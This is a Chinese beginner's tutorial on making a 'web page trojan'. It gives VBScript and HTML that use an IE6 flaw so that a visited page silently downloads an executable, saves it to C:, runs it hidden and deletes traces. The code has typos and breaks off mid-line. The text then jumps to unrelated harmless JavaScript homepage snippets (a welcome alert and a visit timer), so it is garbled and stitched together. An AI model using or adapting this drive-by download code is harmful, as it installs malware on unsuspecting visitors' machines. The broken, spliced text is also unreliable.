网页木马制作讲解（菜鸟版本）

　　以前写了一篇文章，讲了关于怎样用最简单的方法获取对方的管理权限，里面用到了网页木马，最近有许多网友问我怎样制作网页木马，就这个问题我发表篇比较简单易懂的文章，希望大家珍惜我的劳动成果。

　　我们经常听到这样的忠告：“不要随意下在不明的程序，不要随意打开邮件的附件...”这样的忠告确实是有用的，不过我们的系统有不少漏洞，许多木马已经不需要客户端和服务端了，他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能，有的木马会在你完全不知道的情况下潜入，现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子，也就是网页木马.

　　首先我们需要编写几个简单的文件

　　一。名字为abc.abc的文件

<html>
<script language="vbscript">
Function HttpDoGet(url)
　set oReq = CreateObject("Microsoft.XMLHTTP")
　oReq.open "GET",url,false
　oReq.send
　If oReq.status=200 then
　　　　 HttpDoGet=oReq.respomseBody
　　　　 Savefile HttpDoGet,"c:win.exe"
　End If
　Set oReq=nothing
End Function
sub SaveFile(str.fName)
　Set objStream = CreateObject("ADODB.Stream")
　objStream.Type =1
　objStream.Open
　objStream.write str
　objStream.SaveToFile fName.2
　objStream.Close()
　set objStream = nothing
　exewin()
End sub
Sub exewin()
　set wshshell=createobject ("wscript.shell" )
　a=wshshell.run ("cmd.exe /c c:win.exe",0)
　b=wshshell.run ("cmd.exe /c del c:win.hta",0)
　window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>
其中test.exe为木马程序，实现必须放在WEB发布的目录下，文件abc.abc也必须保存在发布的目录下。

　　二。名字为test.htm的文件

<html><body>
木马运行测试！（这句话可以改成你想说的）
<object date="' target=_blank>http://127.0.0.1/win.test";;;></object>
</body></html>

三。名字为win.test的文件

<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
　set oReq = CreateObject("Microsoft.XMLHTTP")
　oReq.open "GET",url,false
　oReq.send
　If oReq.status=200 then
　　　　 HttpDoGet,"c:win.hta"
　　　　 Set oReq=nothing
　End if
end function
sub SaveFile(str,fName)
　Dim fso, tf
　S e t　　f s o　　=　　C r e a t e O b j e c t(Scripting.FileSystemObject")
　Set tf = fso.CreateTextfile(fName,True)
　tf.Write str
　tf.Close
　exewin()
End sub
Sub exewin()
　set wshshell=createobject ("wscript.shell" )
　a=wshshell.run ("cmd.exe /c c:win.hat",

　　如今，上网冲浪已经是一件很时髦的事情，在网上安“家”的虫虫们也越来越多。为了使自己的“家”更有特色，吸引更多的人参观，往往是“八仙过海，各显神通”。而使用得最多的就是应用一些JaveScript小插件。本文就向各位网友提供比较常用的小程序。

　　使用方法很简单，拷贝＋粘贴即可。如果你稍懂一些HTML语言和JaveScript插件语法则更好。

　　1.欢迎对话框

　　一进入网友的“家”，冷不丁蹦出来一个问好的对话框，是不是感到很亲切?没错，实现这效果的程序就是下面的几行：

　＜SCRIPT LANGUAGE=″JAVASCRIPT″＞

　　alert (″n ″既来之，则安之″nn 欢迎您光临我的主页nn 别犹豫 nn LET'S GO！″);

　　＜/SCRIPT＞

　　(注：n 的作用是在对话框中换行)

　　＜b＞2.停留时间＜/b＞

　　网友进入你的“家”，抬头一看，有一个计时钟在不停地跳动，显示他的来访时间，很有趣吧!程序如下：

　　＜HTML＞

　　＜HEAD＞

　　＜META HTTP－EQUIV=″Content－Type″ CONTENT=″text/html;CHARSET=gb2312″＞

　　＜TITLE＞停留时间＜/TITLE＞

　　＜/HEAD＞

　　＜SCRIPT LANGUAGE=″JAVASCRIPT″＞

　　＜!－－

　　var ap_name = navigator.appName;

　　var ap_vinfo = navigator.appVersion;

　　var ap_ver = parseFloat(ap_vinfo.substring(0,ap_vinfo.indexOf(′(′)));

　　var time_start = new Date();

　　var clock_start = time_start.getTime();

　　var dl_ok=false;

　　function init ()

　　{

　　if(ap_name==″Netscape″ ＆＆ ap_ver＞=3.0)

　　dl_ok=true;

　　return true;

　　7}

　　function get_time_spent ()

　　{

　　var time_now = new Date();

　　return((time_now.getTime() － clock_start)/1000);

　　}

　　function show_secs () // show the time user spent on the side

　　{

　　var i_total_secs = Math.round(get_time_spent());

　　var i_secs_spent = i_total_secs ％ 60;

　　var i_mins_spent = Math.round((i_total_secs－30)/60);

　　var s_secs_spent = ″″ ＋ ((i_secs_spent＞9) ? i_secs_spent : ″0″ ＋ i_secs_spent);

　　var s_mins_spent = ″″ ＋ ((i_mins_spent＞9) ? i_mins_spent : ″0″ ＋ i_mins_spent);

　　document.fm0.time_spent.value = s_mins_spent ＋ ″:″ ＋ s_secs_spent;

　　window.setTimeout(′show_secs()′,1000);

　　}

　　// －－＞

　　＜/SCRIPT＞

　　＜BODY onLoad=″init(); window.setTimeout(′show_secs()′,1);″＞

　　＜form name=″fm0″ onSubmit=″0″＞

　　＜font size=″－1″＞＜I＞＜FONT COLOR=″＃888888″＞停留时间:＜/FONT＞＜/I＞＜/font＞＜br＞

　　＜INPUT type=″text″ name=″time_spent″ size=7 onFocus=″this.blur()″＞

　　＜/form＞

　　＜/BODY＞

　　＜/HTML＞